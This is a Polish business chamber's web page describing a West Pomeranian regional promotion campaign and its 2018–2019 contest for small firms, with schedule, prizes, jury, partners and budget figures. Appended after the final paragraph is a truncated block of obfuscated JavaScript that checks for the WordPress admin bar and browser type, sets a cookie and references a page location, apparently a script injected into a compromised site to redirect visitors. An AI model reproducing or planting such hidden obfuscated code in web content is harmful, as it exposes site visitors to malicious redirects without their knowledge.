Kampania „Pomorze Zachodnie. Biznes w dobrym położeniu” | Północna Izba Gospodarcza w Koszalinie

Konkurs „Twój biznes pod banderą sukcesu”

Kampania pod hasłem „Pomorze Zachodnie. Biznes w dobrym położeniu” jest realizowana przez Województwo Zachodniopomorskie.

Termin realizacji kampanii:

7 sierpnia 2018 r.  – 31 grudnia 2019 r.

Konkurs „Twój biznes pod banderą sukcesu”

Najważniejszą inicjatywą realizowaną w ramach kampanii jest konkurs „Twój biznes pod banderą sukcesu”, którego celem jest wyłonienie podmiotów gospodarczych, których działania, produkty i usługi charakteryzują się największą innowacyjnością, kreatywnością
i oryginalnością.

Przewidziane są dwie edycje konkursu:

I edycja:

 • skierowana jest do mikro, małych i średnich przedsiębiorstw
 • termin realizacji: sierpień – grudzień 2018 r.

II edycja:

 • skierowana jest do startupów, mikro, małych i średnich przedsiębiorstw
 • termin realizacji: maj – październik 2019 r.

Kalendarium I edycji konkursu:

 • Przyjmowanie zgłoszeń: 7 sierpnia – 9 września

Zgłoszenia przedsiębiorstw za pośrednictwem formularza elektronicznego

 • Selekcja zgłoszeń: 10 września – 22 października

Wybór i ogłoszenie listy 30 laureatów

 • Prezentacja laureatów: 23 października – 27 listopada

Sylwetki firm – kandydatów prezentowane są w kampanii reklamowej

 • Wybór zwycięzców: 6 – 27 listopada

Uczestnicy otwartego głosowania oraz Kapituła wyłaniają 6 zwycięzców

 • Gala finałowa: 11 grudnia

Prezentacja oraz nagrodzenie zwycięzców i laureatów konkursu

Przyznanie nagród zwycięzcom głosowania

Nagrody dla przedsiębiorców: 74 400 PLN na rozwój firm, w tym dla każdego z 6 zwycięzców voucher o wartości 10 tys. PLN

Nagrody dla uczestników głosowania: 20 osób, które zajmą najwyższe miejsce w głosowaniu, otrzyma nagrodę w postaci tabletu Apple iPad 32GB Wi-Fi

Nagrody dla nominujących: 1 osoba, która najlepiej uargumentuje, dlaczego zgłaszany przez nią przedsiębiorca powinien znaleźć się w konkursie, otrzyma tablet Apple iPad 32GB Wi-Fi

Kapituła konkursu:

 • Laura Hołowacz

Prezeska Zarządu i współzałożycielka CSL Internationale Spedition Sp. z o.o., regionalnego lidera branży TSL.

 • Zbigniew Nagay

Prezes Zarządu i współzałożyciel rodzinnej firmy Radex Sp. j., zaopatrującej w urządzenia
i środki czystości największe zakłady przetwórstwa spożywczego w Polsce i Europie.

 • Sławomir Czumak

Członek Zarządu firmy Backer OBR Sp. z o.o. – światowej klasy producenta elektrycznych elementów grzejnych, rezystorów i paneli sterujących do pomp ciepła.

Partnerzy:

Fundacja BizUp, Infoshare Academy, Koszalińska Agencja Rozwoju Regionalnego, Klaster eBiznesu Pomorza Zachodniego, Klaster ICT Pomorze Zachodnie, Metalika Klaster Metalowy, Regionalne Centrum Innowacji i Transferu Technologii, Północna Izba Gospodarcza, Stargardzka Agencja Rozwoju Regionalnego, TechKlub Szczecin, Transgraniczny Klaster Szlak Wodny Berlin-Szczecin-Bałtyk, Zachodniopomorska Agencja Rozwoju Regionalnego Zachodniopomorskie Stowarzyszenie Rozwoju Gospodarczego, Zachodniopomorska Szkoła Biznesu, Startup Academy.

 

Budżet kampanii: 5 330 000 PLN brutto

 • 57 materiałów filmowych;
 • 92 emisji w prasie lokalnej, regionalnej i krajowej;
 • 29,6 mln wyświetleń materiałów kampanii na FB;
 • 10 tys. obserwujących Instagram;
 • 420 tys. wyświetleń kampanii w serwisach VOD;
 • 2,5 ml odsłon w ramach kampanii z wykorzystaniem elementów Rich Media;
 • 2 mln odsłon kampanii display (onet.pl, wp.pl);
 • 30 tys. folderów reklamowych;
 • 6 influencerów promujących konkurs;
 • 1 470 000 osób zobaczy materiały kampanii na YouTube;
 • 10 tys. osób weźmie udział w grywalizacji;
 • inne działania, np. gala finałowa na 3 tys. osób

Więcej informacji na: biznes.wzp.pl

Kampania „Pomorze Zachodnie. Biznes w dobrym położeniu” oraz konkurs „Twój biznes pod banderą sukcesu” są realizowane w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego 2014 – 2020, Oś Priorytetowa 1 Gospodarka, Innowacje, Nowoczesne Technologie, Działanie 1.14 Wzmocnienie pozycji regionalnej gospodarki w wymiarze krajowym i międzynarodowym.

Celem projektu jest podniesienie poziomu innowacyjności i konkurencyjności gospodarki regionu, dzięki wykorzystaniu potencjału regionalnych i inteligentnych specjalizacji oraz stworzenie lepszych warunków
do rozwoju MŚP poprzez umacnianie wizerunku gospodarczego Województwa Zachodniopomorskiego. 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m